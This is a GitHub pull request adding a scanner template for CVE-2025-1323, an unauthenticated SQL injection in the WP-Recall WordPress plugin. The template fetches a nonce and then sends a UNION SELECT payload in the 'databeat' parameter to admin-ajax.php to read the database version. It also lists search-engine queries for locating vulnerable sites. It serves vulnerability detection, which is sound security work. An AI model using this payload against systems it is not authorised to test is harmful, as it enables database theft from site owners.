Skip to content

Create CVE-2025-1323.yaml #11723

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 4 commits into from
Mar 13, 2025
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
73 changes: 73 additions & 0 deletions http/cves/2025/CVE-2025-1323.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,73 @@
id: CVE-2025-1323

info:
name: WP-Recall – Plugin <= 16.26.10 - Unauthenticated SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
The WP-Recall – Registration, Profile, Commerce & More plugin for WordPress is vulnerable to SQL Injection via the 'databeat' parameter in all versions up to, and including, 16.26.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
remediation: Update to version 16.26.12, or a newer patched version
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-recall/wp-recall-registration-profile-commerce-more-162610-unauthenticated-sql-injection
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ae5b4d81-c2f1-4d0d-b7b0-5556bf0451f5?source=cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-1323
cwe-id: CWE-89
epss-score: 0.00087
epss-percentile: 0.39704
cpe: cpe:2.3:a:plechevandrey:wp-recall:*:*:*:*:*:wordpress:*:*
metadata:
vendor: plechevandrey
product: wp-recall
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/wp-recall/"
fofa-query: body=/wp-content/plugins/wp-recall/
publicwww-query: /wp-content/plugins/wp-recall/
tags: cve,cve2025,wp-recall,wordpress,wp-plugin,sqli,wp

variables:
marker: "{{randstr}}"
token: "{{base64('private:1:5')}}"

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}

extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- 'var Rcl = .*?"nonce":"([a-z0-9]+)"'

- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

action=rcl_beat&ajax_nonce={{nonce}}&databeat=[{"beat_name":"rcl_chat_beat_core","action":"rcl_chat_get_new_messages","data":{"token":"{{token}}","last_activity":"xx' and 1=0 union select 1,2,concat(0x{{hex_encode(marker)}}3a,version()),4,5,6,7--+-"}}]

extractors:
- type: regex
part: body
internal: false
name: version
group: 1
regex:
- 'data-user_id=\\".*?:(.*?)\\">'

matchers:
- type: word
part: body
words:
- '{{marker}}'
- 'content'
- '"beat_name":"rcl_chat_beat_core"'
condition: and